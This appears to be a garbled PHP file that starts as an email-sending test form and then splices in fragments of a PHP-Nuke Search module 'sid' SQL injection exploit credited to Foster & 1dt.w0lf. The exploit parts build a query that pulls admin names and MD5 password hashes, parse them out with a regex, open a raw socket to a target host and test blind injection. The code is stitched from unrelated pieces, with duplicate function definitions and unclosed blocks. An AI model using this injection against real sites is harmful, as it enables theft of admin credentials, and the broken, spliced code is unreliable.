<?php
error_reporting(0);
if (!isset($_POST['sendit'])) {
email_form();
} else {
$required = array('recipient', 'subject', 'message');
foreach ($required as $val) {
if (!isset($_POST[$val]) or $_POST[$val] == '') {
echo "<div class='error'>Error: You must fill out all the form fields</div>";
email_form();
footer();
exit;
}
}
sendit();
}
footer();
function email_form()
{
$action = !isset($_SERVER['PHP_SELF']) ? 'email_test.php' : htmlentities($_SERVER['PHP_SELF']);
$recipient = !isset($_POST['recipient']) ? '' : $_POST['recipient'];
$subject = !isset($_POST['subject']) ? '' : $_POST['subject'];
$message = !isset($_POST['message']) ? '' : $_POST['message'];
?>
<form method="post" action="<?php
echo $action;
?>
">
<input type="hidden" name="sendit" value="true" />
<?php
##########################################################
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##########################################################
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##########################################################
if (isset($_POST['Submit'])) {
$result = sendit('CONCAT("::",aid,"::",pwd,"::")');
if (preg_match("/::([^:]*)::([a-f0-9]{32})::/", $result, $matches)) {
$ahash = $matches[2];
$aname = $matches[1];
}
}
function sendit($param)
{
$prefix = $_POST['prefix'];
$data = $_POST['sql_text'];
$host = $_POST['hostname'];
$page = isset($_POST['dir']) ? '/' . $_POST['dir'] : '';
$page .= '/modules.php?name=Search';
$method = $_POST['method'];
$ref_text = $_POST['ref_text'];
$user_agent = $_POST['user_agent'];
$result = '';
$sock = fsockopen($host, 80, $errno, $errstr, 50);
if (!$sock) {
function check($sqlCookie)
{
global $page, $etalon;
$testPage = toPage(sendit($page, 'GET', $sqlCookie));
if ($testPage < $etalon) {
return 1;
} else {
return 0;
}
}
